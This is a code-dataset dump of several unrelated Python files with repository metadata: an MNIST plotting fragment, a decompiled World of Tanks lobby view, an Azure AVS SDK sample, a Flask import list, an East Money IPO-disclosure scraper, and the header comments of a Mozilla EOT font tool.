# 훈련 세트에 있는 첫 번째 이미지를 보면 픽셀 값의 범위가 0~255 사이
plt.figure()
plt.imshow(x_train[0])
plt.colorbar()
plt.grid(False)
images.image.save_fig("tf2.10.0.mnist_train_images")
plt.show()
# normalizing data
x_train, x_test_normal = x_train / 255.0, x_test / 255.0
# 훈련 세트에서 처음 25개 이미지와 그 아래 클래스 이름을 출력
plt.figure(figsize=(10,10))
for i in range(25):
plt.subplot(5,5,i+1)
plt.xticks([])
plt.yticks([])
plt.grid(False)
plt.imshow(x_train[i], cmap=plt.cm.binary)
plt.xlabel(y_train[i])
images.image.save_fig("tf2.10.0.mnist_train_images1_25")
plt.show()
| [
"[email protected]"
] | |
d7d9397514f924e2e3c51219055782d39055529b | f82e67dd5f496d9e6d42b4fad4fb92b6bfb7bf3e | /scripts/client/gui/scaleform/daapi/view/lobby/lobbyview.py | ccca6333bda22faa53d118768576e781414e63cf | [] | no_license | webiumsk/WOT0.10.0 | 4e4413ed4e7b00e22fb85d25fdae9400cbb4e76b | a84f536c73f86d9e8fab559e97f88f99f2ad7e95 | refs/heads/master | 2021-01-09T21:55:00.662437 | 2015-10-23T20:46:45 | 2015-10-23T20:46:45 | 44,835,654 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,690 | py | # Embedded file name: scripts/client/gui/Scaleform/daapi/view/lobby/LobbyView.py
import BigWorld
import VOIP
import constants
import CommandMapping
from PlayerEvents import g_playerEvents
from gui import game_control, SystemMessages
import gui
from gui.LobbyContext import g_lobbyContext
from gui.battle_control import g_sessionProvider
from gui.Scaleform.daapi.view.meta.LobbyPageMeta import LobbyPageMeta
from gui.Scaleform.framework.entities.View import View
from gui.Scaleform.genConsts.FORTIFICATION_ALIASES import FORTIFICATION_ALIASES
from gui.Scaleform.genConsts.PREBATTLE_ALIASES import PREBATTLE_ALIASES
from gui.Scaleform.locale.SYSTEM_MESSAGES import SYSTEM_MESSAGES
from gui.prb_control.dispatcher import g_prbLoader
from gui.shared.ItemsCache import g_itemsCache
from gui.shared.utils.HangarSpace import g_hangarSpace
from gui.shared import EVENT_BUS_SCOPE, events, event_dispatcher as shared_events
from gui.Scaleform.framework import ViewTypes
from gui.Scaleform.Waiting import Waiting
from gui.Scaleform.daapi.settings.views import VIEW_ALIAS
from gui.shared.utils.functions import getViewName
from helpers import i18n
class LobbyView(LobbyPageMeta):
VIEW_WAITING = (VIEW_ALIAS.LOBBY_HANGAR,
VIEW_ALIAS.LOBBY_INVENTORY,
VIEW_ALIAS.LOBBY_SHOP,
VIEW_ALIAS.LOBBY_PROFILE,
VIEW_ALIAS.LOBBY_BARRACKS,
PREBATTLE_ALIASES.TRAINING_LIST_VIEW_PY,
PREBATTLE_ALIASES.TRAINING_ROOM_VIEW_PY,
VIEW_ALIAS.LOBBY_CUSTOMIZATION,
VIEW_ALIAS.LOBBY_RESEARCH,
VIEW_ALIAS.LOBBY_TECHTREE,
FORTIFICATION_ALIASES.FORTIFICATIONS_VIEW_ALIAS,
VIEW_ALIAS.BATTLE_QUEUE,
VIEW_ALIAS.BATTLE_LOADING)
class COMPONENTS:
HEADER = 'lobbyHeader'
def __init__(self, ctx = None):
super(LobbyView, self).__init__(ctx)
self.__currIgrType = constants.IGR_TYPE.NONE
def getSubContainerType(self):
return ViewTypes.LOBBY_SUB
def _populate(self):
View._populate(self)
self.__currIgrType = gui.game_control.g_instance.igr.getRoomType()
g_prbLoader.setEnabled(True)
self.addListener(events.LobbySimpleEvent.SHOW_HELPLAYOUT, self.__showHelpLayout, EVENT_BUS_SCOPE.LOBBY)
self.addListener(events.LobbySimpleEvent.CLOSE_HELPLAYOUT, self.__closeHelpLayout, EVENT_BUS_SCOPE.LOBBY)
self.addListener(events.GameEvent.SCREEN_SHOT_MADE, self.__handleScreenShotMade, EVENT_BUS_SCOPE.GLOBAL)
g_playerEvents.onVehicleBecomeElite += self.__onVehicleBecomeElite
self.app.loaderManager.onViewLoadInit += self.__onViewLoadInit
self.app.loaderManager.onViewLoaded += self.__onViewLoaded
self.app.loaderManager.onViewLoadError += self.__onViewLoadError
game_control.g_instance.igr.onIgrTypeChanged += self.__onIgrTypeChanged
self.__showBattleResults()
battlesCount = g_itemsCache.items.getAccountDossier().getTotalStats().getBattlesCount()
g_lobbyContext.updateBattlesCount(battlesCount)
self.fireEvent(events.GUICommonEvent(events.GUICommonEvent.LOBBY_VIEW_LOADED))
keyCode = CommandMapping.g_instance.get('CMD_VOICECHAT_MUTE')
if not BigWorld.isKeyDown(keyCode):
VOIP.getVOIPManager().setMicMute(True)
def _dispose(self):
game_control.g_instance.igr.onIgrTypeChanged -= self.__onIgrTypeChanged
self.app.loaderManager.onViewLoadError -= self.__onViewLoadError
self.app.loaderManager.onViewLoaded -= self.__onViewLoaded
self.app.loaderManager.onViewLoadInit -= self.__onViewLoadInit
g_playerEvents.onVehicleBecomeElite -= self.__onVehicleBecomeElite
self.removeListener(events.LobbySimpleEvent.SHOW_HELPLAYOUT, self.__showHelpLayout, EVENT_BUS_SCOPE.LOBBY)
self.removeListener(events.LobbySimpleEvent.CLOSE_HELPLAYOUT, self.__closeHelpLayout, EVENT_BUS_SCOPE.LOBBY)
self.removeListener(events.GameEvent.SCREEN_SHOT_MADE, self.__handleScreenShotMade, EVENT_BUS_SCOPE.GLOBAL)
View._dispose(self)
def __showHelpLayout(self, _):
self.as_showHelpLayoutS()
def __closeHelpLayout(self, _):
self.as_closeHelpLayoutS()
def __handleScreenShotMade(self, event):
if 'path' not in event.ctx:
return
SystemMessages.pushMessage(i18n.makeString('#menu:screenshot/save') % {'path': event.ctx['path']}, SystemMessages.SM_TYPE.Information)
def __onVehicleBecomeElite(self, vehTypeCompDescr):
self.fireEvent(events.LoadViewEvent(VIEW_ALIAS.ELITE_WINDOW, getViewName(VIEW_ALIAS.ELITE_WINDOW, vehTypeCompDescr), {'vehTypeCompDescr': vehTypeCompDescr}), EVENT_BUS_SCOPE.LOBBY)
def moveSpace(self, dx, dy, dz):
if g_hangarSpace.space:
g_hangarSpace.space.handleMouseEvent(int(dx), int(dy), int(dz))
def notifyCursorOver3dScene(self, isOver3dScene):
self.fireEvent(events.LobbySimpleEvent(events.LobbySimpleEvent.NOTIFY_CURSOR_OVER_3DSCENE, ctx={'isOver3dScene': isOver3dScene}))
def __onViewLoadInit(self, view):
if view is not None and view.settings is not None:
self.__subViewTransferStart(view.settings.alias)
return
def __onViewLoaded(self, view):
if view is not None and view.settings is not None:
self.__subViewTransferStop(view.settings.alias)
return
def __onViewLoadError(self, name, msg, item):
if item is not None and item.pyEntity is not None:
self.__subViewTransferStop(item.pyEntity.settings.alias)
return
def __onIgrTypeChanged(self, roomType, xpFactor):
icon = gui.makeHtmlString('html_templates:igr/iconSmall', 'premium')
if roomType == constants.IGR_TYPE.PREMIUM:
SystemMessages.pushMessage(i18n.makeString(SYSTEM_MESSAGES.IGR_CUSTOMIZATION_BEGIN, igrIcon=icon), type=SystemMessages.SM_TYPE.Information)
elif roomType in [constants.IGR_TYPE.BASE, constants.IGR_TYPE.NONE] and self.__currIgrType == constants.IGR_TYPE.PREMIUM:
SystemMessages.pushMessage(i18n.makeString(SYSTEM_MESSAGES.IGR_CUSTOMIZATION_END, igrIcon=icon), type=SystemMessages.SM_TYPE.Information)
self.__currIgrType = roomType
def __subViewTransferStart(self, alias):
if alias in self.VIEW_WAITING:
Waiting.show('loadPage')
def __subViewTransferStop(self, alias):
if alias != VIEW_ALIAS.BATTLE_LOADING and alias in self.VIEW_WAITING:
Waiting.hide('loadPage')
def __showBattleResults(self):
battleCtx = g_sessionProvider.getCtx()
if battleCtx.lastArenaUniqueID:
shared_events.showMyBattleResults(battleCtx.lastArenaUniqueID)
battleCtx.lastArenaUniqueID = None
return
| [
"[email protected]"
] | |
11dfb9beb211a5842f05475135524472e63b0052 | 9df2fb0bc59ab44f026b0a2f5ef50c72b2fb2ceb | /sdk/compute/azure-mgmt-avs/generated_samples/workload_networks_get.py | 60db6d3b5326e38bb0efaea0f5d34f54b45f667d | [
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] | permissive | openapi-env-test/azure-sdk-for-python | b334a2b65eeabcf9b7673879a621abb9be43b0f6 | f61090e96094cfd4f43650be1a53425736bd8985 | refs/heads/main | 2023-08-30T14:22:14.300080 | 2023-06-08T02:53:04 | 2023-06-08T02:53:04 | 222,384,897 | 1 | 0 | MIT | 2023-09-08T08:38:48 | 2019-11-18T07:09:24 | Python | UTF-8 | Python | false | false | 1,556 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.avs import AVSClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-avs
# USAGE
python workload_networks_get.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = AVSClient(
credential=DefaultAzureCredential(),
subscription_id="00000000-0000-0000-0000-000000000000",
)
response = client.workload_networks.get(
resource_group_name="group1",
private_cloud_name="cloud1",
workload_network_name="default",
)
print(response)
# x-ms-original-file: specification/vmware/resource-manager/Microsoft.AVS/stable/2022-05-01/examples/WorkloadNetworks_Get.json
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
aed27d9f42e5ddf4ac6f352e7d7d2b88f8f3a672 | 4eb3ff3e56043bc20162a59039af37533432feb1 | /项目所用模块.py | 1205da794e0b83ed65e541fe40c0fafae5ead37b | [] | no_license | luofang0212/flask_test | 99787a43ba117b0e5684f811ad9f83442c6e95cb | e9ea8644f7bbae94c0b689b79235913f73da7124 | refs/heads/master | 2023-07-26T00:49:53.681815 | 2021-09-06T16:15:11 | 2021-09-06T16:15:11 | 403,010,936 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 469 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# 本项目所用到的模块
''''''
'''
python 自带包
'''
'''
python 第三方库
'''
from flask import Flask
from flask import render_template
from flask import request
import jieba # 分词
from matplotlib import pyplot as plt #绘图,数据可视化
from PIL import Image #图片处理
import numpy as np #矩阵运算
import pymysql # mysql 数据库驱动
from wordcloud import WordCloud #词云
| [
"[email protected]"
] | |
1c84e7fe3a830af4777b1d5b5bd68515f665e933 | 0a973640f0b02d7f3cf9211fcce33221c3a50c88 | /.history/src/easy-money_20210204134044.py | 4c6d13f47417082167dcfd1e70c90cb3da6b4adc | [] | no_license | JiajunChen123/IPO_under_review_crawler | 5468b9079950fdd11c5e3ce45af2c75ccb30323c | 031aac915ebe350ec816c05a29b5827fde588567 | refs/heads/main | 2023-02-26T08:23:09.622725 | 2021-02-04T10:11:16 | 2021-02-04T10:11:16 | 332,619,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,693 | py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@File : easy-money.py
@Time : 2021/02/04 09:03:02
@Author : Jiajun Chen
@Version : 1.0
@Contact : [email protected]
@License : (C)Copyright 2017-2018, Liugroup-NLPR-CASIA
'''
# 东方财富网 首发申报及上会信息
import re
import pickle
from datetime import datetime, timedelta
from urllib.parse import urlencode
import pandas as pd
import requests
import re
import time
from bs4 import BeautifulSoup
import configparser
import os.path
from utils import save_pickle,load_pickle
# config = configparser.ConfigParser()
# config.read('./src/Config.ini')
# # headers = config['eastmoney']['headers']
# base_url = config['eastmoney']['base_url']
base_url = 'https://datainterface.eastmoney.com/EM_DataCenter/JS.aspx?'
lastDate = '2021-1-21'
eastmoney_raw_data_path = './data/EastMoney/eastmoney_raw_data.csv'
zzsc_csv_path = './data/EastMoney/eastmoney_zzsc.csv'
zzsc_pkl_path = './saved_config/eastmoney_zzsc.pkl'
szzxb_stocksInfo_path = './saved_config/szzxb_stocksInfo.pkl'
shzb_stocksInfo_path = './saved_config/shzb_stocksInfo.pkl'
zb_zxb_stocksInfo_path = './saved_config/zb_zxb_stocksInfo.pkl'
eastmoney_meeting_path = './data/EastMoney/eastmoney_data_meeting.csv'
headers = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'}
def update_date():
'''
获取最新更新日期
'''
r = requests.get('http://data.eastmoney.com/xg/xg/sbqy.html',
headers=headers)
r.encoding = 'gbk'
soup = BeautifulSoup(r.text, 'html.parser')
newDate = soup.find('option').get_text()
return newDate
def dateList_gen():
'''
fetch all existing date_data
'''
r = requests.get('http://data.eastmoney.com/xg/xg/sbqy.html',
headers=headers)
r.encoding = 'gbk'
soup = BeautifulSoup(r.text, 'html.parser')
dateList = [i.text for i in soup.findAll('option')]
return dateList
def update_eastmoneyData():
# 如果文件存在,执行更新
# newDate = update_date()
dataList = dateList_gen()
if not os.path.isfile('./data/EastMoney/eastmoneyRawData.csv'):
columns = ['机构名称', '类型', '板块', '注册地', '保荐机构', '保荐代表人', '律师事务所', '签字律师', '会计师事务所',
'签字会计师', '是否提交财务自查报告', '所属行业', '日期', 'xxx', '时间戳', '简称', '文件链接']
with open('./data/EastMoney/eastmoneyRawData.csv','w') as f:
writer = csv.DictWriter(f, fieldnames=columns)
writer.writeheader()
for date in reversed(dataList):
if not os.path.isfile('./data/EastMoney/首发信息/{}.csv'.format(date)):
print('find new date:{}, fetching.....'.format(date))
df =get_eastmoneyData(date)
df.to_csv('./data/EastMoney/eastmoneyRawData.csv', mode='a', header=False,index=False,encoding='utf-8-sig')
return
def get_eastmoneyData(date):
query = {'type': 'NS',
'sty': 'NSFR',
'st': '1',
'sr': '-1',
'p': '1',
'ps': '5000',
'js': 'var IBhynDx={pages:(pc),data:[(x)]}',
'mkt': '1',
'fd' : date,
'rt': '53721774'
}
rs = requests.get(base_url, params=query, headers=headers)
js = rs.text.split('var IBhynDx={pages:1,data:')[1]
data = eval(js[:-1])
temp = [i.split(',') for i in data]
columns = [
'会计师事务所', '保荐代表人', '保荐机构', 'xxx', '律师事务所', '日期', '所属行业', '板块',
'是否提交财务自查报告', '注册地', '类型', '机构名称', '签字会计师', '签字律师', '时间戳', '简称'
]
df = pd.DataFrame(temp, columns=columns)
df['文件链接'] = df['时间戳'].apply(
lambda x: "https://notice.eastmoney.com/pdffile/web/H2_" + x + "_1.pdf"
)
df = df[[
'机构名称', '类型', '板块', '注册地', '保荐机构', '保荐代表人', '律师事务所', '签字律师', '会计师事务所',
'签字会计师', '是否提交财务自查报告', '所属行业', '日期', 'xxx', '时间戳', '简称', '文件链接'
]]
df = df[df['板块'] != '创业板']
df.replace({'是否提交财务自查报告': ' '}, '是')
df.replace({'是否提交财务自查报告': '不适用'}, '是')
df['机构名称'] = df['机构名称'].replace(r'\*', '', regex=True)
df['机构名称'] = df['机构名称'].replace(r'股份有限公司', '', regex=True)
df.to_csv('C:/Users/chen/Desktop/IPO_info/data/EastMoney/首发信息/{}.csv'.format(date),index=False, encoding='utf-8-sig')
return df
def update_zzscData():
newDate = update_date()
if newDate != lastDate:
try:
zzsc_dict = load_pickle(zzsc_pkl_path)
data = get_zzscData(newDate)
for i in data:
name = i.split(',')[1]
if name not in zzsc_dict:
zzsc_dict[name] = i.split(',')[2]
else:
continue
except:
zzsc_dict = gen_zzscDict()
else:
zzsc_df = pd.DataFrame(zzsc_dict.items(), columns=['机构名称', '决定终止审查时间'])
zzsc_df['机构名称'] = zzsc_df['机构名称'].replace(r'\*', '', regex=True)
zzsc_df['机构名称'] = zzsc_df['机构名称'].replace(r'股份有限公司', '', regex=True)
zzsc_df['机构名称'] = zzsc_df['机构名称'].replace(r'\(', '(', regex=True)
zzsc_df['机构名称'] = zzsc_df['机构名称'].replace(r'\)', ')', regex=True)
zzsc_df.to_csv(zzsc_csv_path,
encoding='utf-8-sig',
index=False)
save_pickle(zzsc_dict,zzsc_pkl_path)
return zzsc_df
def gen_zzscDict():
dateList = dateList_gen()
zzsc_dict = {}
for date in dateList:
data = get_zzscData(date)
for i in data:
name = i.split(',')[1]
if name not in zzsc_dict:
zzsc_dict[name] = i.split(',')[2]
else:
continue
save_pickle(zzsc_dict,zzsc_pkl_path)
return zzsc_dict
def get_zzscData(date):
query = {
'type': 'NS',
'sty': 'NSSE',
'st': '1',
'sr': '-1',
'p': '1',
'ps': '500',
'js': 'var IBhynDx={pages:(pc),data:[(x)]}',
'mkt': '4',
'stat': 'zzsc',
'fd': date,
'rt': '53727636'
}
url = base_url + urlencode(query)
rss = requests.get(url, headers=headers)
if rss.text == 'var IBhynDx={pages:0,data:[{stats:false}]}':
return ''
jss = rss.text.split('var IBhynDx={pages:1,data:')[1]
data = eval(jss[:-1])
return data
def get_meetingData(newDate):
if newDate != lastDate or not os.path.isfile(eastmoney_meeting_path):
meetingInfo = []
for marketType in ['2', '4']: # 2 为主板, 4 为中小板
query = {
'type': 'NS',
'sty': 'NSSH',
'st': '1',
'sr': '-1',
'p': '1',
'ps': '5000',
'js': 'var IBhynDx={pages:(pc),data:[(x)]}',
'mkt': marketType,
'rt': '53723990'
}
url = base_url + urlencode(query)
rss = requests.get(url, headers=headers)
jss = rss.text.split('var IBhynDx={pages:1,data:')[1]
data = eval(jss[:-1])
meetingInfo.extend(data)
temp = [j.split(',') for j in meetingInfo]
columns = [
'时间戳', 'yyy', '公司代码', '机构名称', '详情链接', '申报日期', '上会日期', '申购日期', '上市日期',
'9', '拟发行数量', '发行前总股本', '发行后总股本', '13', '占发行后总股本比例', '当前状态', '上市地点',
'主承销商', '承销方式', '发审委委员', '网站', '简称'
]
df = pd.DataFrame(temp, columns=columns)
df['文件链接'] = df['时间戳'].apply(
lambda x: "https://notice.eastmoney.com/pdffile/web/H2_" + x + "_1.pdf"
)
df['详情链接'] = df['公司代码'].apply(
lambda x: "data.eastmoney.com/xg/gh/detail/" + x + ".html")
df = df[[
'机构名称', '当前状态', '上市地点', '拟发行数量', '申报日期', '上会日期', '申购日期', '上市日期',
'主承销商', '承销方式', '9', '发行前总股本', '发行后总股本', '13', '占发行后总股本比例', '发审委委员',
'网站', '公司代码', 'yyy', '时间戳', '简称', '详情链接', '文件链接'
]]
df['机构名称'] = df['机构名称'].replace(r'\*', '', regex=True)
df['机构名称'] = df['机构名称'].replace(r'股份有限公司', '', regex=True)
df['机构名称'] = df['机构名称'].replace(r'\(', '(', regex=True)
df['机构名称'] = df['机构名称'].replace(r'\)', ')', regex=True)
df.to_csv(
eastmoney_meeting_path,
index=False,
encoding='utf-8-sig')
else:
df = pd.read_csv(eastmoney_meeting_path,keep_default_na=False)
return df
def eastmoney_cleanUP():
east_money = pd.read_csv(eastmoney_raw_data_path, keep_default_na=False)
east_money.replace({'是否提交财务自查报告': ' '}, '是')
east_money.replace({'是否提交财务自查报告': '不适用'}, '是')
east_money['机构名称'] = east_money['机构名称'].replace(r'\*', '', regex=True)
east_money['机构名称'] = east_money['机构名称'].replace(r'股份有限公司', '', regex=True)
east_money['机构名称'] = east_money['机构名称'].replace(r'\(', '(', regex=True)
east_money['机构名称'] = east_money['机构名称'].replace(r'\)', ')', regex=True)
east_money = east_money[east_money['板块'] != '创业板']
east_money['类型'] = pd.Categorical(east_money['类型'],
categories=["已受理","已反馈","预先披露更新","中止审查","已提交发审会讨论,暂缓表决",
"已上发审会,暂缓表决","已通过发审会"],ordered=True)
east_money.sort_values(['机构名称','保荐机构','类型','日期'], inplace=True)
# east_money.to_csv('./pre_cleab.csv',encoding='utf-8-sig',index=False)
east_money.drop_duplicates(subset=['机构名称','保荐机构', '类型',],
keep='first',
inplace=True)
east_money.to_csv(
'./data/EastMoney/eastmoney_data_cleaned_v2.csv',
encoding='utf-8-sig',
index=False)
return east_money
def gen_finalData(cleaned_easymoney_df, meetingInfo_df, zzsc_df):
'''
主板、中小板 = {'机构名称':'',
'简称':'',
'Wind代码':'',
'统一社会信用代码':'',
'板块':'',
'注册地':'',
'所属行业':'',
'经营范围':'',
'预先披露':'[日期]',
'已反馈':'[日期]',
'预先披露更新':'[日期]',
'发审会':{'中止审查':'[日期]',
'已上发审会,暂缓表决':'[日期]',
'已提交发审会讨论,暂缓表决:'[日期]',
'已通过发审会':'[日期]'},
'终止审查':'[日期]',
'上市日期':'[日期]',
'保荐机构':'',
'律师事务所':,
'会计师事务所':'',
'发行信息':{'拟发行数量':'',
'发行前总股本':'',
'发行后总股本':''},
'反馈文件':'[链接]'
}
'''
all_data = {} # 总数据
ekk = cleaned_easymoney_df.values.tolist()
for i in ekk:
i
if i[0] not in all_data:
all_data[i[0]] = {
'机构名称': i[0] + '股份有限公司',
'简称': i[15],
'Wind代码': '',
'统一社会信用代码': '',
'板块': i[2],
'注册地': '',
'所属行业': '',
'经营范围': '',
'预先披露': '',
'已反馈': '',
'预先披露更新': '',
'发审会': {
'中止审查': '',
'已上发审会,暂缓表决': '',
'已提交发审会讨论,暂缓表决': '',
'已通过发审会': ''
},
'终止审查': '',
'上市日期': '',
'保荐机构': i[4],
'保荐代表人': '',
'律师事务所': i[6],
'签字律师': '',
'会计师事务所': i[8],
'签字会计师': '',
'发行信息': {
'拟发行数量(万)': '',
'发行前总股本(万)': '',
'发行后总股本(万)': ''
},
'反馈文件': ''
}
if i[1] == '已受理':
all_data[i[0]]['预先披露'] = i[12]
elif i[1] == '已反馈':
all_data[i[0]]['已反馈'] = i[12]
elif i[1] == '预先披露更新':
all_data[i[0]]['预先披露更新'] = i[12]
elif i[1] == '已通过发审会':
all_data[i[0]]['发审会']['已通过发审会'] = i[12]
elif i[1] == '已提交发审会讨论,暂缓表决':
all_data[i[0]]['发审会']['已提交发审会讨论,暂缓表决'] = i[12]
elif i[1] == '已上发审会,暂缓表决':
all_data[i[0]]['发审会']['已上发审会,暂缓表决'] = i[12]
elif i[1] == '中止审查':
all_data[i[0]]['发审会']['中止审查'] = i[12]
if all_data[i[0]]['注册地'] == '' and i[3] != '':
all_data[i[0]]['注册地'] = i[3]
if all_data[i[0]]['所属行业'] == '' and i[11] != '':
all_data[i[0]]['所属行业'] = i[11]
if all_data[i[0]]['保荐代表人'] == '' and i[5] != '':
all_data[i[0]]['保荐代表人'] = i[5]
if all_data[i[0]]['签字律师'] == '' and i[7] != '':
all_data[i[0]]['签字律师'] = i[7]
if all_data[i[0]]['签字会计师'] == '' and i[9] != '':
all_data[i[0]]['签字会计师'] = i[9]
# 添加上会信息
ekk2 = meetingInfo_df.values.tolist()
error_set = {}
for i in ekk2:
i[0] = i[0].replace(r'股份有限公司', '')
if i[0] not in all_data:
print("Error: Cannot find ", i[0])
error_set.update({i[0]: i[5]})
continue
if i[1] == '上会未通过':
all_data[i[0]]['发审会']['上会未通过'] = i[5]
elif i[1] == '取消审核':
all_data[i[0]]['发审会']['取消审核'] = i[5]
elif i[1] == '上会通过':
all_data[i[0]]['发审会']['已通过发审会'] = i[5]
if i[7] != '':
all_data[i[0]]['上市时间'] = i[7]
all_data[i[0]]['发行信息']['拟发行数量'] = "{:.2f}".format(int(i[3]) / 10000)
all_data[i[0]]['发行信息']['发行前总股本'] = "{:.2f}".format(int(i[11]) / 10000)
all_data[i[0]]['发行信息']['发行后总股本'] = "{:.2f}".format(int(i[12]) / 10000)
# 添加终止审查信息
ekk3 = zzsc_df.values.tolist()
for i in ekk3:
name = i[0].replace(r'股份有限公司', '')
if name not in all_data:
print("Error: Cannot find in zzsc", i[0])
error_set.update({name: i[1]})
continue
all_data[name]['终止审查'] = i[1]
save_pickle(all_data, zb_zxb_stocksInfo_path)
return all_data
# def update_all():
# try:
# with open('','rb') as file:
# zb_zxb_dict = pickle.load(file)
# _,temp = update_eastmoneyData()
# for i in temp:
# if i not in zb_zxb_dict:
# pass
# else:
# # columns = [
# # '会计师事务所', '保荐代表人', '保荐机构', 'xxx', '律师事务所', '日期', '所属行业', '板块',
# # '是否提交财务自查报告', '注册地', '类型', '机构名称', '签字会计师', '签字律师', '时间戳', '简称'
# # ]
# i[]
def update_stockInfo(df):
try:
allStocksInfo = load_pickle(zb_zxb_stocksInfo_path)
except:
east_money_df = eastmoney_cleanUP()
meetingInfo_df = get_meetingData()
zzsc_df = update_zzscData()
allStocksInfo = gen_finalData(east_money_df,meetingInfo_df,zzsc_df)
else:
for index, row in df.iterrows():
if row['类型'] != ['已受理','已反馈','预先披露更新']:
if allStocksInfo[row['机构名称']]['发审会'][row['类型']] == '':
allStocksInfo[row['机构名称']]['发审会'][row['类型']] = row['日期']
else:
if allStocksInfo[row['机构名称']][row['类型']] == '':
allStocksInfo[row['机构名称']][row['类型']] = row['日期']
if __name__ == '__main__':
# newDate = update_date()
# # update_eastmoneyData(newDate)
# east_money_df = eastmoney_cleanUP()
# meetingInfo_df = get_meetingData(newDate)
# zzsc_df = update_zzscData(newDate)
# # dateList = date_gen()
# # get_eastmoneyData(dateList)
# # east_money_df = eastmoney_cleanUP()
# # east_money_df = pd.read_csv('./EastMoney/easymoney_data_new.csv',keep_default_na=False)
# # meetingInfo_df = pd.read_csv('./EastMoney/eastmoney_data_meeting.csv',keep_default_na=False)
# # meetingInfo_df = get_meetingData()
# # zzsc_df = pd.read_csv('./EastMoney/zzsc.csv')
# all_data,_,_ = gen_finalData(east_money_df,meetingInfo_df,zzsc_df)
# print('Complete!')
eastmoney_cleanUP() | [
"[email protected]"
] | |
9f66513cbf1b5dd410e4e8fa89518981ebb1faa4 | 7f2e3f56f0eda8bfa1c55d8d173456fad04a05bd | /app/static/ionicons/builder/scripts/eotlitetool.py | 1643bea1df87fa8c96c85bbdb1d1f941a115e8b7 | [
"MIT"
] | permissive | pipoted/movie | 91e40a3184884dc3e1db61eac7a5d6c7b7cfdb33 | be13cc1845c377dc1145267fbf799c004f170793 | refs/heads/master | 2020-03-28T13:18:06.166066 | 2018-09-11T21:14:48 | 2018-09-11T21:14:48 | 148,381,341 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,986 | py | #!/usr/bin/env python
# ***** BEGIN LICENSE BLOCK *****
# Version: MPL 1.1/GPL 2.0/LGPL 2.1
#
# The contents of this file are subject to the Mozilla Public License Version
# 1.1 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
# http://www.mozilla.org/MPL/
#
# Software distributed under the License is distributed on an "AS IS" basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
#
# The Original Code is font utility code.
#
# The Initial Developer of the Original Code is Mozilla Corporation.
# Portions created by the Initial Developer are Copyright (C) 2009
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# John Daggett <[email protected]>
#
# Alternatively, the contents of this file may be used under the terms of
# either the GNU General Public License Version 2 or later (the "GPL"), or
# the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
# in which case the provisions of the GPL or the LGPL are applicable instead
# of those above. If you wish to allow use of your version of this file only
# under the terms of either the GPL or the LGPL, and not to allow others to
# use your version of this file under the terms of the MPL, indicate your
# decision by deleting the provisions above and replace them with the notice
# and other provisions required by the GPL or the LGPL. If you do not delete
# the provisions above, a recipient may use your version of this file under
# the terms of any one of the MPL, the GPL or the LGPL.
#
# ***** END LICENSE BLOCK ***** */
# eotlitetool.py - create EOT version of OpenType font for use with IE
#
# Usage: eotlitetool.py [-o output-filename] font1 [font2 ...]
#
# OpenType file structure
# http://www.microsoft.com/typography/otspec/otff.htm
#
# Types:
#
# BYTE 8-bit unsigned integer.
# CHAR 8-bit signed integer.
# USHORT 16-bit unsigned integer.
# SHORT 16-bit signed integer.
# ULONG 32-bit unsigned integer.
# Fixed 32-bit signed fixed-point number (16.16)
# LONGDATETIME Date represented in number of seconds since 12:00 midnight, January 1, 1904. The value is represented as a signed 64-bit integer.
#
# SFNT Header
#
# Fixed sfnt version // 0x00010000 for version 1.0.
# USHORT numTables // Number of tables.
# USHORT searchRange // (Maximum power of 2 <= numTables) x 16.
# USHORT entrySelector // Log2(maximum power of 2 <= numTables).
# USHORT rangeShift // NumTables x 16-searchRange.
#
# Table Directory
#
# ULONG tag // 4-byte identifier.
# ULONG checkSum // CheckSum for this table.
# ULONG offset // Offset from beginning of TrueType font file.
# ULONG length // Length of this table.
#
# OS/2 Table (Version 4)
#
# USHORT version // 0x0004
# SHORT xAvgCharWidth
# USHORT usWeightClass
# USHORT usWidthClass
# USHORT fsType
# SHORT ySubscriptXSize
# SHORT ySubscriptYSize
# SHORT ySubscriptXOffset
# SHORT ySubscriptYOffset
# SHORT ySuperscriptXSize
# SHORT ySuperscriptYSize
# SHORT ySuperscriptXOffset
# SHORT ySuperscriptYOffset
# SHORT yStrikeoutSize
# SHORT yStrikeoutPosition
# SHORT sFamilyClass
# BYTE panose[10]
# ULONG ulUnicodeRange1 // Bits 0-31
# ULONG ulUnicodeRange2 // Bits 32-63
# ULONG ulUnicodeRange3 // Bits 64-95
# ULONG ulUnicodeRange4 // Bits 96-127
# CHAR achVendID[4]
# USHORT fsSelection
# USHORT usFirstCharIndex
# USHORT usLastCharIndex
# SHORT sTypoAscender
# SHORT sTypoDescender
# SHORT sTypoLineGap
# USHORT usWinAscent
# USHORT usWinDescent
# ULONG ulCodePageRange1 // Bits 0-31
# ULONG ulCodePageRange2 // Bits 32-63
# SHORT sxHeight
# SHORT sCapHeight
# USHORT usDefaultChar
# USHORT usBreakChar
# USHORT usMaxContext
#
#
# The Naming Table is organized as follows:
#
# [name table header]
# [name records]
# [string data]
#
# Name Table Header
#
